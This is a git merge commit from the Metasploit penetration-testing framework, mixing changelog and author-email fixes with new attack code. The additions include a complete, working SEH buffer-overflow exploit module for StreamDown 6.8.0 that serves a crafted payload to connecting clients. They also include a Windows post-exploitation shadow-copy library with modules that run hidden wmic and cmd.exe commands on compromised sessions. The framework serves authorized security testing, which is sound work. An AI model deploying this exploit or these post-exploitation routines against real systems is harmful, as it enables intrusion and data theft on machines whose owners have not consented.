Merge remote branch 'upstream/master'

unstable
chao-mu 2012-01-02 20:07:50 -05:00
commit b9b5b1e66f
51 changed files with 848 additions and 79 deletions

Binary file not shown.

View File

@ -1,6 +1,41 @@
Armitage Changelog
==================
30 Dec 11 - last release of the year?
---------
- Hosts -> Clear Database now clears the sessions and clients tables
- Fixed a bug preventing dynamic workspace port/session filter from
working on a fresh database. This was a fun one. This only affected
folks with a completely fresh database and because Hosts -> Clear
Database didn't clear everything, this went unnoticed until now.
- Added various reverse shell payloads to payload helper dialog.
- Added file chooser helper for SigningCert and SigningKey options.
- Added hack to return correct route info when setting up pivoting through
Java meterpreter.
- Armitage now posts a note to the event log when a user starts a browser
exploit or a server module.
- Armitage now supports dragging and dropping a module onto a host in graph
and table view. This action opens the module launcher configured to work
with that host.
- Drastically rewrote MSF Scans. MSF Scans now intelligently builds a list
of ports to scan based on what Metasploit can do. After an initial port
scan, MSF Scans runs discovery modules against relevant hosts. As a bonus
you will see all of the output of these scans.
- Enhanced the Windows heuristic used to guess which OS image to display
- The deconfliction server throttle is now less draconian about how long it
throttles a call.
- Armitage no longer posts to the event log from the UI thread (this will
prevent the UI from blocking in some cases)
- Command shell now handles interaction with d-server in a separate thread
from the UI thread. This will prevent UI blocking in some cases.
- Added Ping Sweep... option for non-Windows meterpreter sessions. Now Java
meterpreter users have a quick host discovery option.
- Change Host OS option now matches new Metasploit database schema.
- Deconfliction server now sets LHOST to the IP address you provided. Also,
Armitage clients do not overwrite LHOST once it is set.
- Interacting with a shell in team mode no longer blocks UI to communicate
with d-server.
12 Dec 11
---------
- Armitage teaming mode now downloads the resulting file for any fileformat

View File

@ -19,7 +19,6 @@ module Auxiliary::Report
end
def myworkspace
return @myworkspace if @myworkspace
@myworkspace = framework.db.find_workspace(self.workspace)
end

View File

@ -0,0 +1,201 @@
require 'msf/core/post/windows/services'
module Msf
class Post
module Windows
module ShadowCopy
include Msf::Post::Windows::WindowsServices
def get_vss_device(id)
result = get_sc_param(id,'DeviceObject')
end
def vss_list
ids = vss_get_ids
shadow_copies = []
ids.each do |id|
print_status "Getting data for Shadow Copy #{id} (This may take a minute)"
shadow_copies << get_sc_details("\"#{id}\"")
end
return shadow_copies
end
def vss_get_ids
result = wmicexec('shadowcopy get id')
ids = result.scan(/\{\w{8}-\w{4}-\w{4}-\w{4}-\w{12}\}/)
return ids
end
def vss_get_storage
storage={}
storage['AllocatedSpace'] = vss_get_storage_param('AllocatedSpace')
storage['MaxSpace'] = vss_get_storage_param('MaxSpace')
storage['UsedSpace'] = vss_get_storage_param('UsedSpace')
return storage
end
def get_sc_details(id)
shadowcopy={}
shadowcopy['ID'] = id
shadowcopy['ClientAccessible'] = get_sc_param(id,'ClientAccessible')
shadowcopy['Count'] = get_sc_param(id,'Count')
shadowcopy['DeviceObject'] = get_sc_param(id,'DeviceObject')
shadowcopy['Differential'] = get_sc_param(id,'Differential')
shadowcopy['ExposedLocally'] = get_sc_param(id,'ExposedLocally')
shadowcopy['ExposedName'] = get_sc_param(id,'ExposedName')
shadowcopy['ExposedRemotely'] = get_sc_param(id,'ExposedRemotely')
shadowcopy['HardwareAssisted'] = get_sc_param(id,'HardwareAssisted')
shadowcopy['Imported'] = get_sc_param(id,'Imported')
shadowcopy['NoAutoRelease'] = get_sc_param(id,'NoAutoRelease')
shadowcopy['NotSurfaced'] = get_sc_param(id,'Notsurfaced')
shadowcopy['NoWriters'] = get_sc_param(id,'NoWriters')
shadowcopy['OriginiatingMachine'] = get_sc_param(id,'OriginatingMachine')
shadowcopy['Persistent'] = get_sc_param(id,'Persistent')
shadowcopy['Plex'] = get_sc_param(id,'Plex')
shadowcopy['ProviderID'] = get_sc_param(id,'ProviderID')
shadowcopy['ServiceMachine'] = get_sc_param(id,'ServiceMachine')
shadowcopy['SetID'] = get_sc_param(id,'SetID')
shadowcopy['State'] = get_sc_param(id,'State')
shadowcopy['Transportable'] = get_sc_param(id,'Transportable')
shadowcopy['VolumeName'] = get_sc_param(id,'VolumeName')
return shadowcopy
end
def get_sc_param(id,param_name)
result = wmicexec("shadowcopy where(id=#{id}) get #{param_name}")
result.gsub!(param_name,'')
result.gsub!(/\s/,'')
end
def vss_get_storage_param(param_name)
result = wmicexec("shadowstorage get #{param_name}")
result.gsub!(param_name,'')
result.gsub!(/\s/,'')
end
def vss_set_storage(bytes)
result = wmicexec("shadowstorage set MaxSpace=\"#{bytes}\"")
if result.include?("success")
return true
else
return false
end
end
def create_shadowcopy(volume)
result = wmicexec("shadowcopy call create \"ClientAccessible\", \"#{volume}\"")
retval = result.match(/ReturnValue = (\d)/)
case retval[1].to_i
when 0
print_status("ShadowCopy created successfully")
sc_id = result.match(/ShadowID = ("\{\w{8}-\w{4}-\w{4}-\w{4}-\w{12}\}")/)
return sc_id[1]
when 1
print_error("Access Denied")
when 2
print_error("Invalid Argument")
when 3
print_error("Specified volume not found")
when 4
print_error("Specified volume not supported")
when 5
print_error("Unsupported shadow copy context")
when 6
print_error("Insufficient Storage")
when 7
print_error("Volume is in use")
when 8
print_error("Maximum number of shadow copies reached")
when 9
print_error("Another shadow copy operation is already in progress")
when 10
print_error("Shadow copy provider vetoed the operation")
when 11
print_error("Shadow copy provider not registered")
when 12
print_error("Shadow copy provider failure")
else
print_error("Unknown error")
end
return nil
end
def start_vss
vss_state = wmicexec('Service where(name="VSS") get state')
if vss_state=~ /Running/
print_status("Volume Shadow Copy service is running.")
else
print_status("Volume Shadow Copy service not running. Starting it now...")
begin
ss_result = service_start("VSS")
case ss_result
when 0
print_status("Volume Shadow Copy started successfully.")
when 1
print_error("Volume Shadow Copy already running.")
when 2
print_error("Volume Shadow Copy is disabled.")
print_status("Attempting to re-enable...")
service_change_startup("VSS","manual")
ss_result = service_start("VSS")
if ss_result == 0
return true
else
return false
end
end
rescue
print_error("Insufficient Privs to start service!")
return false
end
end
return true
end
def wmicexec(wmiccmd)
tmpout = ''
session.response_timeout=120
begin
tmp = session.fs.file.expand_path("%TEMP%")
wmicfl = tmp + "\\"+ sprintf("%.5d",rand(100000))
r = session.sys.process.execute("cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /append:#{wmicfl} #{wmiccmd}", nil, {'Hidden' => true})
sleep(2)
#Making sure that wmic finishes before executing next wmic command
prog2check = "wmic.exe"
found = 0
while found == 0
session.sys.process.get_processes().each do |x|
found =1
if prog2check == (x['name'].downcase)
sleep(0.5)
found = 0
end
end
end
r.close
# Read the output file of the wmic commands
wmioutfile = session.fs.file.new(wmicfl, "rb")
until wmioutfile.eof?
tmpout << wmioutfile.read
end
wmioutfile.close
rescue ::Exception => e
print_error("Error running WMIC commands: #{e.class} #{e}")
end
# We delete the file with the wmic command output.
c = session.sys.process.execute("cmd.exe /c del #{wmicfl}", nil, {'Hidden' => true})
c.close
tmpout.gsub!(/[^[:print:]]/,'') #scrub out garbage
return tmpout
end
end
end
end
end

View File

@ -71,7 +71,7 @@ class Client
resp = MessagePack.unpack(res.body)
if resp and resp.kind_of?(::Hash) and resp['error'] == true
raise Msf::RPC::ServerException.new(res.code, resp['error_message'] || resp['error_string'], resp['error_class'], resp['error_backtrace'])
raise Msf::RPC::ServerException.new(resp['error_code'] || res.code, resp['error_message'] || resp['error_string'], resp['error_class'], resp['error_backtrace'])
end
return resp

View File

@ -88,6 +88,9 @@ class Core
"kill" => "Kill a job",
"load" => "Load a framework plugin",
"loadpath" => "Searches for and loads modules from a path",
"popm" => "Pops the latest module off of the module stack and makes it active",
"pushm" => "Pushes the active or list of modules onto the module stack",
"previous" => "Sets the previously loaded module as the current module",
"quit" => "Exit the console",
"resource" => "Run the commands stored in a file",
"makerc" => "Save commands entered since start to a file",
@ -118,6 +121,8 @@ class Core
@dscache = {}
@cache_payloads = nil
@previous_module = nil
@module_name_stack = []
end
#
@ -2127,8 +2132,9 @@ class Core
return false
end
# If there's currently an active module, go back
# If there's currently an active module, enqueque it and go back
if (active_module)
@previous_module = active_module
cmd_back()
end
@ -2153,6 +2159,94 @@ class Core
driver.update_prompt("#{prompt} #{mod.type}(%bld%red#{mod.shortname}%clr) ", prompt_char, true)
end
#
# Command to take to the previously active module
#
def cmd_previous()
if @previous_module
self.cmd_use(@previous_module.fullname)
else
print_error("There isn't a previous module at the moment")
end
end
#
# Help for the 'previous' command
#
def cmd_previous_help
print_line "Usage: previous"
print_line
print_line "Set the previously loaded module as the current module"
print_line
end
#
# Command to enqueque a module on the module stack
#
def cmd_pushm(*args)
# could check if each argument is a valid module, but for now let them hang themselves
if args.count > 0
args.each do |arg|
@module_name_stack.push(arg)
# Note new modules are appended to the array and are only module (full)names
end
else #then just push the active module
if active_module
#print_status "Pushing the active module"
@module_name_stack.push(active_module.fullname)
else
print_error("There isn't an active module and you didn't specify a module to push")
return self.cmd_pushm_help
end
end
end
#
# Help for the 'pushm' command
#
def cmd_pushm_help
print_line "Usage: pushm [module1 [,module2, module3...]]"
print_line
print_line "push current active module or specified modules onto the module stack"
print_line
end
#
# Command to dequeque a module from the module stack
#
def cmd_popm(*args)
if (args.count > 1 or not args[0].respond_to?("to_i"))
return self.cmd_popm_help
elsif args.count == 1
# then pop 'n' items off the stack, but don't change the active module
if args[0].to_i >= @module_name_stack.count
# in case they pass in a number >= the length of @module_name_stack
@module_name_stack = []
print_status("The module stack is empty")
else
@module_name_stack.pop[args[0]]
end
else #then just pop the array and make that the active module
pop = @module_name_stack.pop
if pop
return self.cmd_use(pop)
else
print_error("There isn't anything to pop, the module stack is empty")
end
end
end
#
# Help for the 'popm' command
#
def cmd_popm_help
print_line "Usage: popm [n]"
print_line
print_line "pop the latest module off of the module stack and make it the active module"
print_line "or pop n modules off the stack, but don't change the active module"
print_line
end
#
# Tab completion for the use command
#

View File

@ -948,6 +948,27 @@ class Db
end
end
end
# Handle hostless loot
if host_ranges.compact.empty? # Wasn't a host search
hostless_loot = framework.db.loots.find_all_by_host_id(nil)
hostless_loot.each do |loot|
row = []
row.push("")
row.push("")
row.push(loot.ltype)
row.push(loot.name || "")
row.push(loot.content_type)
row.push(loot.info || "")
row.push(loot.path)
tbl << row
if (mode == :delete)
loot.destroy
delete_count += 1
end
end
end
print_line
print_line tbl.to_s
print_status "Deleted #{delete_count} loots" if delete_count > 0

View File

@ -253,7 +253,7 @@ module Net; module SSH; module Service
'MsfExploit' => session.options[:msfmodule]
}
)
options[:msfmodule].add_socket(client) if session.options[:msfmodule]
session.options[:msfmodule].add_socket(client) if session.options[:msfmodule]
info { "connected #{connected_address}:#{connected_port} originator #{originator_address}:#{originator_port}" }

View File

@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'BID', '31531' ],
[ 'URL', 'http://www.trendmicro.com/ftp/documentation/readme/OSCE_7.3_Win_EN_CriticalPatch_B1372_Readme.txt' ],
],
'Author' => [ 'Anshul Pandey <anshul999@gmail.com>', 'patrick' ],
'Author' => [ 'Anshul Pandey <anshul999[at]gmail.com>', 'patrick' ],
'License' => MSF_LICENSE
)

View File

@ -29,7 +29,7 @@ class Metasploit3 < Msf::Auxiliary
'Author' =>
[
'sid', # Original POC
'TheLightCosine <thelightcosine@gmail.com>' # msf module
'TheLightCosine <thelightcosine[at]gmail.com>' # msf module
],
'License' => MSF_LICENSE,
'Version' => '$Revision$',

View File

@ -27,8 +27,8 @@ class Metasploit3 < Msf::Auxiliary
ChangeCipherspec Datagram before a ClientHello.
},
'Author' => [
'Jon Oberheide <jon@oberheide.org>', #original code
'TheLightCosine <thelightcosine@gmail.com>' # metasploit module
'Jon Oberheide <jon[at]oberheide.org>', #original code
'TheLightCosine <thelightcosine[at]gmail.com>' # metasploit module
],
'License' => MSF_LICENSE,
'Version' => '$Revision$',

View File

@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
Enterprise Business Suite service.
},
'Author' => [ 'guiness.stout <guinness.stout@gmail.com>' ],
'Author' => [ 'guiness.stout <guinness.stout[at]gmail.com>' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$',
'References' =>

View File

@ -24,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary
without SP1 does not seem affected by this flaw.
},
'Author' => [ 'laurent.gaffie[at]gmail.com', 'hdm' ],
'Author' => [ 'Laurent Gaffie <laurent.gaffie[at]gmail.com>', 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>

View File

@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary
info for a given CorpWatch ID of the company. If you don't know the
CorpWatch ID, please use the corpwatch_lookup_name module first.
},
'Author' => [ 'Brandon Perry' ],
'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' ],
'References' =>
[
[ 'URL', 'http://api.corpwatch.org/' ]
@ -520,7 +520,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
p = store_loot("corpwatch_api.#{datastore['CW_ID']}_info","text/plain",nil,loot,"company_#{datastore['CWID']}.txt","#{datastore["CW_ID"]} Specific Information")
p = store_loot("corpwatch_api.#{datastore['CW_ID']}_info","text/plain",nil,loot,"company_#{datastore['CW_ID']}.txt","#{datastore["CW_ID"]} Specific Information")
print_line()
print_status("Saved in: #{p}")

View File

@ -23,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary
acknolwdge the limitations of the data CorpWatch provides, and should always
verify the information with the official SEC filings before taking any action.
},
'Author' => [ 'Brandon Perry' ],
'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' ],
'References' =>
[
[ 'URL', 'http://api.corpwatch.org/' ]

View File

@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary
'Name' => 'DECT Call Scanner',
'Version' => '$Revision$',
'Description' => 'This module scans for active DECT calls',
'Author' => [ 'DK <privilegedmode@gmail.com>' ],
'Author' => [ 'DK <privilegedmode[at]gmail.com>' ],
'License' => MSF_LICENSE,
'References' => [ ['URL', 'http://www.dedected.org'] ]
)

View File

@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary
'Name' => 'DECT Base Station Scanner',
'Version' => '$Revision$',
'Description' => 'This module scans for DECT base stations',
'Author' => [ 'DK <privilegedmode@gmail.com>' ],
'Author' => [ 'DK <privilegedmode[at]gmail.com>' ],
'License' => MSF_LICENSE,
'References' => [ ['URL', 'http://www.dedected.org'] ]
)

View File

@ -26,12 +26,13 @@ class Metasploit3 < Msf::Exploit::Remote
This module exploits a buffer overflow in the encryption option handler of the
FreeBSD telnet service.
},
'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry', 'Dan Rosenberg', 'hdm' ],
'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry <bperry.volatile[at]gmail.com>', 'Dan Rosenberg', 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
['BID', '51182'],
['CVE', '2011-4862'],
['OSVDB', '78020'],
['BID', '51182'],
['URL', 'http://www.exploit-db.com/exploits/18280/']
],
'Privileged' => true,

View File

@ -28,12 +28,13 @@ class Metasploit3 < Msf::Exploit::Remote
use NetKit-derived telnet daemons, so this flaw only applies to a small subset of
Linux systems running telnetd.
},
'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry', 'Dan Rosenberg', 'hdm' ],
'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry <bperry.volatile[at]gmail.com>', 'Dan Rosenberg', 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
['BID', '51182'],
['CVE', '2011-4862'],
['OSVDB', '78020'],
['BID', '51182'],
['URL', 'http://www.exploit-db.com/exploits/18280/']
],
'Privileged' => true,
@ -49,7 +50,6 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'Automatic', { } ],
[ 'Red Hat Enterprise Linux 3 (krb5-telnet)', { 'Ret' => 0x0804b43c } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => ''))

View File

@ -27,9 +27,9 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Author' =>
[
'EgiX <n0b0d13s[at]gmail-com>', # original discovery/poc
'mr_me <steventhomasseeley[at]gmail-com>', # msf
'TecR0c <roccogiovannicalvi[at]gmail-com >', # msf
'EgiX <n0b0d13s[at]gmail.com>', # original discovery/poc
'mr_me <steventhomasseeley[at]gmail.com>', # msf
'TecR0c <roccogiovannicalvi[at]gmail.com >', # msf
],
'License' => MSF_LICENSE,
'Version' => '$Revision$',

View File

@ -27,11 +27,12 @@ class Metasploit3 < Msf::Exploit::Remote
[
'Plone Security team', # Vulnerability discovery
'Nick Miles', # Original exploit
'TecR0c' # Metasploit module
'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit module
],
'References' =>
[
['CVE', '2011-3587'],
['OSVDB', '76105'],
['URL', 'http://www.exploit-db.com/exploits/18262/'],
['URL', 'http://plone.org/products/plone/security/advisories/20110928']
],

View File

@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' =>
[
'EgiX', # Vulnerability discovery and exploit
'TecR0c' # Metasploit Module
'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit Module
],
'References' =>
[

View File

@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' =>
[
'EgiX', # Vulnerability discovery and exploit
'TecR0c' # Metasploit Module
'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit Module
],
'References' =>
[

View File

@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' =>
[
'shinnai', # original discovery
'mr_me', # msf
'mr_me <steventhomasseeley[at]gmail.com>', # msf
'sinn3r' # wbemexec tekniq
],
'Version' => '$Revision$',

View File

@ -29,8 +29,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' =>
[
'Dr_IDE', # Vulnerability discovery and original exploit
'TecR0c', # Metasploit module
'mr_me' # Metasploit module
'TecR0c <roccogiovannicalvi[at]gmail.com>', # Metasploit module
'mr_me <steventhomasseeley[at]gmail.com>' # Metasploit module
],
'Version' => '$Revision: $',
'References' =>

View File

@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
'regenrecht', # discovery
'Rh0', # metasploit module
'mr_me' # win7 target
'mr_me <steventhomasseeley[at]gmail.com>' # win7 target
],
'Version' => "$Revision$",
'References' =>

View File

@ -35,8 +35,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Matteo Memelli', #PoC from Exploit-DB
'dookie2000ca', #"Helping" ryujin (Matteo)
'sinn3r', #Metasploit
'mr_me', #XP target (no aslr)
'TecR0c', #XP target (no aslr)
'mr_me <steventhomasseeley[at]gmail.com>', #XP target (no aslr)
'TecR0c <roccogiovannicalvi[at]gmail.com>', #XP target (no aslr)
],
'References' =>
[

View File

@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'Author' =>
[
'Trirat Puttaraksa <trir00t [at] gmail.com>',
'Trirat Puttaraksa <trir00t[at]gmail.com>',
],
'Version' => '$Revision$',
'References' =>

View File

@ -152,6 +152,7 @@ class Metasploit3 < Msf::Exploit::Remote
if target.name == 'Automatic'
mytarget = auto_target(cli, request)
if mytarget.nil?
agent = request.headers['User-Agent']
print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
send_not_found(cli)
return

View File

@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'Trancer <mtrancer[at]gmail.com' ],
'Author' => [ 'Trancer <mtrancer[at]gmail.com>' ],
'Version' => '$Revision$',
'References' =>
[

View File

@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote
property of ienipp.ocx an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'Trancer <mtrancer[at]gmail.com' ],
'Author' => [ 'Trancer <mtrancer[at]gmail.com>' ],
'Version' => '$Revision$',
'References' =>
[

View File

@ -28,8 +28,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' =>
[
'Luigi Auriemma', # original find
'mr_me <steventhomasseeley[at]gmail-com>', # msf module
'TecR0c <roccogiovannicalvi[at]gmail-com >',# msf module
'mr_me <steventhomasseeley[at]gmail.com>', # msf module
'TecR0c <roccogiovannicalvi[at]gmail.com >',# msf module
],
'Version' => '$Revision$',
'References' =>

View File

@ -29,8 +29,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' =>
[
'shinnai', # Vulnerability discovery and original exploit
'TecR0c', # Metasploit module
'mr_me' # Metasploit module
'TecR0c <roccogiovannicalvi[at]gmail.com>', # Metasploit module
'mr_me <steventhomasseeley[at]gmail.com>' # Metasploit module
],
'Version' => '$Revision: $',
'References' =>

View File

@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' =>
[
'hdm',
'Faithless <rhyskidd [at] gmail.com>'
'Faithless <rhyskidd[at]gmail.com>'
],
'Version' => '$Revision$',
'References' =>

View File

@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' =>
[
'Microsoft', # reported to Adobe
'villy <villys777 [at] gmail.com>', # public exploit
'villy <villys777[at]gmail.com>', # public exploit
# Metasploit version by:
'jduck'
],

View File

@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
'sup3r', #Initial disclosure, poc (9.5)
'sickn3ss', #9.6 poc
'sinn3r', #Metasploit
'mr_me', #NX bypass target
'mr_me <steventhomasseeley[at]gmail.com>', #NX bypass target
'silent_dream', #Win 7 target
],
'References' =>

View File

@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'Author' =>
[
'Jeremy Brown <0xjbrown41 [at] gmail.com>',
'Jeremy Brown <0xjbrown41[at]gmail.com>',
'loneferret',
],
'Version' => '$Revision$',

View File

@ -36,8 +36,8 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'Author' =>
[
'mr_me', # original discovery & msf exploit
'TecR0c' # msf exploit
'mr_me <steventhomasseeley[at]gmail.com>', # original discovery & msf exploit
'TecR0c <roccogiovannicalvi[at]gmail.com>' # msf exploit
],
'Version' => '$Revision$',
'References' =>

View File

@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Author' =>
[
'Paul Makowski <my.hndl [at] gmail.com>', # original version
'Paul Makowski <my.hndl[at]gmail.com>', # original version
'jduck' # various fixes, remove most hardcoded addresses
],
'License' => MSF_LICENSE,

View File

@ -0,0 +1,77 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'StreamDown 6.8.0 Buffer overflow',
'Description' => %q{
Stream Down 6.8.0 seh based buffer overflow triggered when processing
the server reponse packet.During the overflow a structured exception
handler is overwritten.
},
'Author' => 'Fady Mohamed Osman <fady.mohamed.osman[at]gmail.com>',
'References' =>
[
['OSVDB', '78043'],
['BID', '51190'],
['URL', 'http://www.dark-masters.tk/'],
['URL', 'http://secunia.com/advisories/47343/'],
['URL', 'http://www.exploit-db.com/exploits/18283/']
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
'InitialAutoRunScript' => 'migrate -f'
},
'Payload' =>
{
'BadChars' => "\x00\xff\x0a"
},
'Platform' => 'win',
'Targets' =>
[
[
'StreamDown 6.8.0',
{
'Offset' => 16388,
'Ret' => 0x10019448 #POP/POP/RET in DownloadMng.dll
}
],
],
'DefaultTarget' => 0,
'License' => MSF_LICENSE
))
end
def on_request_uri(cli,request)
vprint_status("#{cli.peerhost}:#{cli.peerport} requested: #{request.uri}")
# No point to continue if the client isn't what we interested in
ua = request.headers['User-Agent']
if ua !~ /CoCSoft Stream Download/i
print_error("Target not supported: #{ua}")
send_not_found(cli)
return
end
nseh = "\xeb\x06" + rand_text_alpha(2)
seh = [target.ret].pack('V')
offset_to_nseh = target['Offset']
nops = make_nops(10)
sploit = rand_text_alpha(offset_to_nseh) + nseh + seh + nops + payload.encoded
cli.put(sploit)
close_client(cli)
end
end

View File

@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
'Luigi Auriemma', # Original discovery and poc
'Celil UNUVER',
'TecR0c', # Module Metasploit
'TecR0c <roccogiovannicalvi[at]gmail.com>', # Module Metasploit
'sinn3r'
],
'References' =>

View File

@ -23,7 +23,7 @@ module Metasploit3
'Name' => 'Generic x86 Debug Trap',
'Version' => '$Revision$',
'Description' => 'Generate a debug trap in the target process',
'Author' => 'robert <robertmetasploit [at] gmail.com>',
'Author' => 'robert <robertmetasploit[at]gmail.com>',
'Platform' => [ 'win', 'linux', 'bsd', 'solaris', 'bsdi', 'osx' ],
'License' => MSF_LICENSE,
'Arch' => ARCH_X86,

View File

@ -29,7 +29,7 @@ class Metasploit3 < Msf::Post
},
'License' => MSF_LICENSE,
'Version' => "$Revision$",
'Author' => [ 'Brandon Perry' ],
'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' ],
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter' ]
))

View File

@ -22,7 +22,7 @@ class Metasploit3 < Msf::Post
'Name' => 'Windows Gather Product Key',
'Description' => %q{ This module will enumerate the OS license key },
'License' => MSF_LICENSE,
'Author' => [ 'Brandon Perry'],
'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>'],
'Version' => '$Revision$',
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter' ]

View File

@ -0,0 +1,62 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/windows/shadowcopy'
require 'msf/core/post/windows/priv'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Priv
include Msf::Post::Windows::ShadowCopy
def initialize(info={})
super(update_info(info,
'Name' => "Windows Manage Create Shadow Copy",
'Description' => %q{
This module will attempt to create a new volume shadow copy.
This is based on the VSSOwn Script originally posted by
Tim Tomes and Mark Baggett.
Works on win2k3 and later.
},
'License' => MSF_LICENSE,
'Platform' => ['windows'],
'SessionTypes' => ['meterpreter'],
'Author' => ['thelightcosine <thelightcosine[at]metasploit.com']
))
register_options(
[
OptString.new('VOLUME', [ true, 'Volume to make a copy of.', 'C:\\'])
], self.class)
end
def run
unless is_admin?
print_error("This module requires admin privs to run")
return
end
unless start_vss
return
end
id = create_shadowcopy(datastore['VOLUME'])
if id
print_good "Shadow Copy #{id} created!"
end
end
end

View File

@ -0,0 +1,76 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/windows/shadowcopy'
require 'msf/core/post/windows/priv'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Priv
include Msf::Post::Windows::ShadowCopy
def initialize(info={})
super(update_info(info,
'Name' => "Windows Manage List Shadow Copies",
'Description' => %q{
This module will attempt to list any Volume Shadow Copies
on the system. This is based on the VSSOwn Script
originally posted by Tim Tomes and Mark Baggett.
Works on win2k3 and later.
},
'License' => MSF_LICENSE,
'Platform' => ['windows'],
'SessionTypes' => ['meterpreter'],
'Author' => ['thelightcosine <thelightcosine[at]metasploit.com']
))
end
def run
unless is_admin?
print_error("This module requires admin privs to run")
return
end
unless start_vss
return
end
list = ""
shadow_copies = vss_list
unless shadow_copies.empty?
shadow_copies.each do |copy|
tbl = Rex::Ui::Text::Table.new(
'Header' => 'Shadow Copy Data',
'Indent' => 1,
'Columns' => ['Field', 'Value']
)
copy.each_pair{|k,v| tbl << [k,v]}
list << " #{tbl.to_s} \n\n"
print_good tbl.to_s
end
store_loot(
'host.shadowcopies',
'text/plain',
session,
list,
'shadowcopies.txt',
'Shadow Copy Info'
)
end
end
end

View File

@ -0,0 +1,63 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/windows/shadowcopy'
require 'msf/core/post/windows/priv'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Priv
include Msf::Post::Windows::ShadowCopy
def initialize(info={})
super(update_info(info,
'Name' => "Windows Manage Mount Shadow Copy",
'Description' => %q{
This module will attempt to mount a Volume Shadow Copy
on the system. This is based on the VSSOwn Script
originally posted by Tim Tomes and Mark Baggett.
Works on win2k3 and later.
},
'License' => MSF_LICENSE,
'Platform' => ['windows'],
'SessionTypes' => ['meterpreter'],
'Author' => ['thelightcosine <thelightcosine[at]metasploit.com']
))
register_options(
[
OptString.new('DEVICE', [ true, 'DeviceObject of Shadowcopy to mount.' ]),
OptString.new('PATH', [ true, 'Path to mount it to.' ])
], self.class)
end
def run
unless is_admin?
print_error("This module requires admin privs to run")
return
end
unless start_vss
return
end
r = session.sys.process.execute("cmd.exe /C mklink /D #{datastore['DEVICE']} #{datastore['PATH']}", nil, {'Hidden' => true})
end
end

View File

@ -0,0 +1,64 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/windows/shadowcopy'
